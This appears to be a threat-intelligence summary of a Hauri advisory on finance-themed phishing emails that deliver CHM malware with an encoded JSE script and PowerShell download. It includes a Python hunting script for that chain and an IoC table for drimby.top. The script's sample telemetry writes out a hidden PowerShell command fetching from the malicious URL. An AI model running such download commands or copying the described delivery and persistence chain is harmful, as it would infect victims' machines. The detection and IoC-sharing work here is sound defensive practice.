Beware of phishing emails impersonating financial institutions

2023-08-01 Hauri Beware of phishing emails impersonating financial institutions

https://hauri.co.kr/security/issue_view.html?intSeq=421&page=1&article_num=332


Hauri warns that phishing emails impersonating financial institutions were distributing CHM malware using finance-themed attachments such as product contracts, automatic insurance-payment notices, card-limit changes, and tax invoices. After extraction, the CHM package contains an HTML file and an encoded Docs.jse; the embedded script decodes the CHM, hides the JSE in a public library path, and launches it with wscript. The malware registers the JSE for autorun persistence and uses PowerShell to reach a malicious site and download an additional payload. The source identifies the download command targeting drimby.top/wndfi and detects the threat as HTML.S.CHMPhishing.
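As an added detection example (not code from the Hauri report), the chain described above expressed as a hunt over process-creation records: wscript running a .jse from the Public profile, and a PowerShell child of wscript reaching out to a URL, checked against the domain in the report's IoC table. The Sysmon-style record fields, the hh.exe parent process, the C:\Users\Public\Libraries location and all sample events are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass

# Domain named in the report's IoC table.
IOC_DOMAINS = {"drimby.top"}

# Assumed field set of a process-creation record (Sysmon Event ID 1 style).
@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable path
    cmdline: str    # full command line

# A .jse launched from anywhere under C:\Users\Public (the "public library path"
# the report describes; the exact subfolder is an assumption).
JSE_IN_PUBLIC = re.compile(r"\\users\\public\\[^\"']*\.jse\b", re.I)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def find_chm_chain(events):
    """Return (stage, pid, host) alerts for the CHM -> wscript(.jse) -> PowerShell chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        img = e.image.lower()
        parent = by_pid.get(e.ppid)
        pimg = parent.image.lower() if parent else ""
        # Stage 1: wscript running a .jse from the Public profile; stronger if the CHM viewer spawned it.
        if img.endswith("wscript.exe") and JSE_IN_PUBLIC.search(e.cmdline):
            stage = "jse_from_public_by_hh" if pimg.endswith("hh.exe") else "jse_from_public"
            alerts.append((stage, e.pid, None))
        # Stage 2: PowerShell spawned by wscript with a URL on its command line.
        if img.endswith("powershell.exe") and pimg.endswith("wscript.exe"):
            m = URL_HOST.search(e.cmdline)
            if m:
                host = m.group(1).lower()
                stage = "ps_download_known_ioc" if host in IOC_DOMAINS else "ps_download_unknown_host"
                alerts.append((stage, e.pid, host))
    return alerts

# Constructed sample telemetry (not from the report): one malicious chain plus two benign events.
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\hh.exe", r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\contract.chm'),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\Public\Libraries\Docs.jse"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr https://drimby.top/wndfi"'),
    ProcEvent(400, 1, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Scripts\logon.vbs"),
    ProcEvent(500, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -c Get-Date"),
]

if __name__ == "__main__":
    for alert in find_chm_chain(SAMPLE):
        print(alert)
```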

Indicators of Compromise

Type     Value                      First Seen   Last Seen
URL      https://drimby.top/wndfi   2023-08-01   2023-08-21
DOMAIN   drimby.top                 2023-08-01   2023-08-21
